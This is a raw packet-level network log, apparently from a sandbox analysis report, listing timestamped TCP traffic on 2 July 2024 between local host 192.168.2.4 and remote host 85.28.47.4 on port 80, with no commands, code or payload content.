                                            Jul 2, 2024 08:26:29.471853018 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.471854925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471867085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471879005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471892118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471904039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471904039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.471918106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471919060 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.471929073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471937895 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.471941948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471956968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.471961975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471972942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.471980095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.471985102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472001076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472002029 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472013950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472023964 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472027063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472038984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472050905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472054958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472062111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472063065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472074986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472086906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472089052 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472101927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472115993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472121954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472131968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472134113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472147942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472156048 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472160101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472171068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472179890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472182989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472193956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472194910 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472206116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472217083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472220898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472229958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472240925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472259045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472259045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472270012 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472273111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472285986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472297907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472304106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472309113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472312927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472315073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472321033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472332001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472342968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472352982 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472354889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472366095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472377062 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472378016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472388983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472388983 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472402096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472419024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472420931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472435951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472441912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472446918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472455978 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472457886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472469091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472489119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472490072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472513914 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472518921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472528934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472531080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472542048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472553968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472559929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472572088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472573996 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472584009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472584963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472595930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472604036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472608089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472620010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472620964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472632885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472644091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472647905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472656012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472656965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472666979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472680092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.472688913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472709894 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.472728968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.473476887 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473489046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473500013 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473519087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473526955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.473531008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473546982 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.473571062 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.473613024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473625898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473653078 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.473675013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.473759890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473773003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473783970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473794937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473802090 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.473807096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473818064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473824978 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.473829985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473840952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473846912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.473853111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473865032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.473865032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.473879099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.473903894 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.500355005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500369072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500380039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500386000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500510931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500524044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500530005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500530005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.500541925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500566959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.500591040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.500689030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500700951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500710964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500722885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500734091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500742912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.500746012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500756025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500766993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500778913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500791073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500791073 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.500802994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.500825882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.500842094 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558129072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558152914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558165073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558187962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558192968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558198929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558204889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558211088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558216095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558221102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558248997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558254957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558259964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558260918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558262110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558268070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558274984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558284998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558296919 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558299065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558307886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558319092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558330059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558340073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558351040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558357954 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558362961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558374882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558382988 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558387041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558403969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558408022 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558417082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558428049 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558442116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558456898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558490038 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558540106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558551073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558562040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558573008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558576107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558597088 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558629036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558726072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558739901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558751106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558767080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558779001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558783054 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558820009 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558875084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558887005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558897972 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558909893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558919907 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558923006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558934927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.558945894 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.558984041 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.559856892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559863091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559870005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559878111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559880972 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559883118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559885979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559900045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559916019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559917927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.559926987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559937954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559946060 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.559948921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559961081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559967041 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.559972048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559983015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.559986115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.559999943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560003042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560014009 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560029030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560060024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560081005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560194016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560206890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560218096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560229063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560237885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560237885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560249090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560256958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560261011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560271978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560285091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560292959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560296059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560313940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560333014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560338974 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560344934 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560354948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560365915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560375929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560379028 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560394049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560396910 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560405016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560415030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560429096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560431004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560442924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.560458899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560476065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.560494900 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562336922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562352896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562365055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562376976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562387943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562398911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562408924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562424898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562429905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562442064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562453985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562463045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562464952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562477112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562483072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562493086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562498093 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562505007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562505007 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562516928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562522888 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562529087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562541962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562553883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562561035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562565088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562575102 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562577009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562587976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562602043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562607050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562618017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562623978 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562628984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562639952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562645912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562652111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562661886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562670946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562673092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562685013 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.562695026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.562717915 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.645818949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.645848036 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.645862103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.645875931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.645900965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.645910025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.645922899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.645931005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.645972013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646049023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646059990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646070957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646081924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646090984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646094084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646110058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646135092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646255970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646298885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646384001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646394968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646405935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646423101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646429062 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646435976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646447897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646454096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646457911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646480083 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646500111 CEST6388080192.168.2.485.28.47.4
